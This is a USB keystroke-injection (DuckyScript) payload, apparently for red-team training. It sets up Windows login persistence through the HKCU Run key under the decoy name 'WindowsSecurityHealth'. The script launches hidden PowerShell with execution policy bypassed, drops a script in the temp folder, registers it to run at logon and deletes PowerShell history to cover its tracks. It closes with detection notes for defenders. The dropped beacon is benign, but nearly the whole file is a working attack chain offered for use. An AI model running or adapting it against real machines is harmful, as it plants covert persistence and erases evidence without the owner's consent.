REM =====================================================
REM Payload: RT-01 - Registry Run Key Persistence
REM MITRE ATT&CK: T1547.001
REM Purpose: Establish persistence via registry
REM Platform: Windows 10/11
REM =====================================================
REM EDUCATIONAL PURPOSE ONLY - Authorized testing only
REM =====================================================

REM === Configuration ===
REM Persistence Name: WindowsSecurityHealth
REM Payload Location: User's temp directory
REM Trigger: User login

REM === USB Enumeration Delay ===
DELAY 2000

REM === Open Hidden PowerShell ===
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass -nop
ENTER
DELAY 1500

REM === Create Persistence Payload ===
REM This creates a benign beacon script for training
STRINGLN $payloadPath = "$env:TEMP\WindowsSecurityHealth.ps1"
STRINGLN $payload = @'
# Training Beacon - Logs activity only
$logPath = "$env:TEMP\security_health.log"
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
"[$timestamp] Security Health Check - Training Mode" | Out-File $logPath -Append
'@
STRINGLN $payload | Out-File $payloadPath -Force

REM === Install Registry Persistence ===
STRINGLN $regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
STRINGLN $regName = "WindowsSecurityHealth"
STRINGLN $regValue = "powershell.exe -w hidden -ep bypass -f `"$payloadPath`""
STRINGLN Set-ItemProperty -Path $regPath -Name $regName -Value $regValue -Force

REM === Verify Installation ===
STRINGLN $verify = Get-ItemProperty -Path $regPath -Name $regName -EA SilentlyContinue
STRINGLN if ($verify) {
STRINGLN   "[SUCCESS] Persistence installed" | Out-File "$env:TEMP\.persist_confirm" -Force
STRINGLN }

REM === Cleanup Evidence ===
STRINGLN Remove-Item (Get-PSReadLineOption).HistorySavePath -EA SilentlyContinue
STRINGLN Clear-History

REM === Exit ===
STRINGLN exit

REM =====================================================
REM Blue Team Notes:
REM Detection: Monitor HKCU\...\Run for new entries
REM Event ID: Sysmon 13 (Registry Value Set)
REM Cleanup: Remove-ItemProperty -Path "HKCU:\...\Run" -Name "WindowsSecurityHealth"
REM =====================================================
